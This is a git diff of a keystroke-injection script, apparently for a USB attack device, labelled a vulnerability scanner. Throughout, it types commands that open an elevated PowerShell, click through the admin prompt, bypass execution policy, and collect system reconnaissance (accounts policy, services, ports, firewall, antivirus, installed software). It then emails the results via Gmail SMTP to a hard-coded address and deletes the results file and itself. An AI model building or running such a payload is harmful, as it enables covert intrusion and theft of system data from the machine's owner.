diff --git a/3.0. VulnerabilityScanner b/3.0. VulnerabilityScanner index 32e9f9f..8f2ab62 100644 --- a/3.0. VulnerabilityScanner +++ b/3.0. VulnerabilityScanner @@ -1,345 +1,344 @@ REM script in progress -DELAY 5000 +DELAY 1000 REM Open Start Menu CONTROL ESCAPE DELAY 3000 STRING powershell -DELAY 3000 REM Navigate to the context menu to run PowerShell as an administrator -DELAY 1500 +DELAY 2000 RIGHTARROW -DELAY 1500 +DELAY 500 DOWNARROW -DELAY 1500 +DELAY 500 ENTER DELAY 5000 ALT Y DELAY 5000 REM Set PowerShell Execution Policy to Bypass -DELAY 500 -STRING Set-ExecutionPolicy Bypass -Scope Process -Force -DELAY 500 +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 100 ENTER -DELAY 500 +DELAY 400 REM Create the PowerShell script in memory and execute it -DELAY 500 -STRING $securePassword = ConvertTo-SecureString 'YourAppSpecificPassword' -AsPlainText -Force -DELAY 500 +DELAY 100 +STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force +DELAY 100 ENTER -DELAY 500 -STRING $credential = New-Object System.Management.Automation.PSCredential ('igrowsc@gmail.com', $securePassword) -DELAY 500 +DELAY 400 +STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword) +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING $script = { -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-PasswordPolicy { -DELAY 500 +DELAY 400 +STRING function check-passwordpolicy { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING net accounts -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Audit-Services { -DELAY 500 +DELAY 400 +STRING function audit-services { +DELAY 100 ENTER -DELAY 500 -STRING Get-Service | Select-Object Name, DisplayName, Status, StartType -DELAY 500 +DELAY 400 +STRING get-service | select-object name, displayname, status, starttype +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-NetworkSettings { -DELAY 500 +DELAY 400 +STRING function check-networksettings { +DELAY 100 ENTER -DELAY 500 -STRING Get-NetIPConfiguration -DELAY 500 +DELAY 400 +STRING get-netipconfiguration +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-SoftwareVulnerabilities { -DELAY 500 +DELAY 400 +STRING function check-softwarevulnerabilities { +DELAY 100 ENTER -DELAY 500 -STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher -DELAY 500 +DELAY 400 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 1000 -STRING function Check-CVE { -DELAY 1000 +DELAY 400 +STRING function check-cve { +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING param ( -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 -STRING [string]$productName, -DELAY 1000 +DELAY 400 +STRING [string]$productname, +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING [string]$version -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING ) -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 -STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productName+$version" -DELAY 1000 +DELAY 400 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 100 ENTER -DELAY 1000 -STRING Start-Sleep -Seconds 5 -DELAY 500 +DELAY 400 +STRING start-sleep -seconds 5 +DELAY 100 ENTER -DELAY 500 -STRING $response = Invoke-RestMethod -Uri $uri -Method Get -DELAY 1000 +DELAY 400 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 100 ENTER -DELAY 1000 -STRING if ($response.totalResults -gt 0) { -DELAY 500 +DELAY 400 +STRING if ($response.totalresults -gt 0) { +DELAY 100 ENTER -DELAY 500 -STRING foreach ($cve in $response.result.CVE_Items) { -DELAY 500 +DELAY 400 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 100 ENTER -DELAY 500 -STRING "$($cve.cve.CVE_data_meta.ID) - $($cve.cve.description.description_data[0].value)" -DELAY 500 +DELAY 400 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } else { -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING "No CVEs found for $productName $version" -DELAY 500 +DELAY 400 +STRING "no cves found for $productname $version" +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Analyze-Logs { -DELAY 500 +DELAY 400 +STRING function analyze-logs { +DELAY 100 ENTER -DELAY 500 -STRING Get-EventLog -LogName System -Newest 100 -DELAY 500 +DELAY 400 +STRING get-eventlog -logname system -newest 100 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-OpenPorts { -DELAY 500 +DELAY 400 +STRING function check-openports { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING netstat -an -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-MissingUpdates { -DELAY 500 +DELAY 400 +STRING function check-missingupdates { +DELAY 100 ENTER -DELAY 500 -STRING Get-WindowsUpdateLog -DELAY 500 +DELAY 400 +STRING get-windowsupdatelog +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-FirewallStatus { -DELAY 500 +DELAY 400 +STRING function check-firewallstatus { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING netsh advfirewall show allprofiles -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-SMBv1Status { -DELAY 500 +DELAY 400 +STRING function check-smbv1status { +DELAY 100 ENTER -DELAY 500 -STRING Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -DELAY 500 +DELAY 400 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-AntivirusStatus { -DELAY 500 +DELAY 400 +STRING function check-antivirusstatus { +DELAY 100 ENTER -DELAY 500 -STRING Get-MpComputerStatus -DELAY 500 +DELAY 400 +STRING get-mpcomputerstatus +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Send-EmailAndCleanup { -DELAY 500 +DELAY 400 +STRING function send-emailandcleanup { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING param ( -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpServer, -DELAY 500 +DELAY 400 +STRING [string]$smtpserver, +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpFrom, -DELAY 500 +DELAY 400 +STRING [string]$smtpfrom, +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpTo, -DELAY 500 +DELAY 400 +STRING [string]$smtpto, +DELAY 100 ENTER -DELAY 500 -STRING [string]$messageSubject, -DELAY 500 +DELAY 400 +STRING [string]$messagesubject, +DELAY 100 ENTER -DELAY 500 -STRING [string]$messageBody, -DELAY 500 +DELAY 400 +STRING [string]$messagebody, +DELAY 100 ENTER -DELAY 500 -STRING [string]$attachmentPath, -DELAY 500 +DELAY 400 +STRING [string]$attachmentpath, +DELAY 100 ENTER -DELAY 500 -STRING [System.Management.Automation.PSCredential]$credential -DELAY 500 +DELAY 400 +STRING [system.management.automation.pscredential]$credential +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING ) -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING $smtp = New-Object Net.Mail.SmtpClient($smtpServer) -DELAY 500 +DELAY 400 +STRING $smtp = new-object net.mail.smtpclient($smtpserver) +DELAY 100 ENTER -DELAY 500 -STRING $smtp.Credentials = $credential -DELAY 500 +DELAY 400 +STRING $smtp.credentials = $credential +DELAY 100 ENTER -DELAY 500 -STRING $smtp.EnableSsl = $true -DELAY 500 +DELAY 400 +STRING $smtp.enablessl = $true +DELAY 100 ENTER -DELAY 500 -STRING $smtp.Send($smtpFrom, $smtpTo, $messageSubject, $messageBody + (Get-Content -Path $attachmentPath -Raw)) -DELAY 500 +DELAY 400 +STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw)) +DELAY 100 ENTER -DELAY 500 -STRING Remove-Item -Path $attachmentPath -DELAY 500 +DELAY 400 +STRING remove-item -path $attachmentpath +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING Check-PasswordPolicy > results.txt -DELAY 500 +DELAY 400 +STRING check-passwordpolicy > results.txt +DELAY 100 ENTER -DELAY 500 -STRING Audit-Services >> results.txt -DELAY 500 +DELAY 400 +STRING audit-services >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-NetworkSettings >> results.txt -DELAY 500 +DELAY 400 +STRING check-networksettings >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-SoftwareVulnerabilities >> results.txt -DELAY 500 +DELAY 400 +STRING check-softwarevulnerabilities >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Analyze-Logs >> results.txt -DELAY 500 +DELAY 400 +STRING analyze-logs >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-OpenPorts >> results.txt -DELAY 500 +DELAY 400 +STRING check-openports >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-MissingUpdates >> results.txt -DELAY 500 +DELAY 400 +STRING check-missingupdates >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-FirewallStatus >> results.txt -DELAY 500 +DELAY 400 +STRING check-firewallstatus >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-SMBv1Status >> results.txt -DELAY 500 +DELAY 400 +STRING check-smbv1status >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-AntivirusStatus >> results.txt -DELAY 500 +DELAY 400 +STRING check-antivirusstatus >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | ForEach-Object { Check-CVE -productName $_.DisplayName -version $_.DisplayVersion } >> results.txt -DELAY 500 +DELAY 400 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Send-EmailAndCleanup -smtpServer "smtp.gmail.com" -smtpFrom "igrowsc@gmail.com" -smtpTo "igrowsc@gmail.com" -messageSubject "Vulnerability Scan Results" -messageBody "Attached are the results of the vulnerability scan." -attachmentPath "results.txt" -credential $credential -DELAY 500 +DELAY 400 +STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential +DELAY 100 ENTER -DELAY 500 -STRING Remove-Item -Path $MyInvocation.MyCommand.Path -DELAY 500 +DELAY 400 +STRING remove-item -path $myinvocation.mycommand.path +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING Invoke-Command -ScriptBlock $script -DELAY 500 +DELAY 400 +STRING invoke-command -scriptblock $script +DELAY 100 ENTER DELAY 20000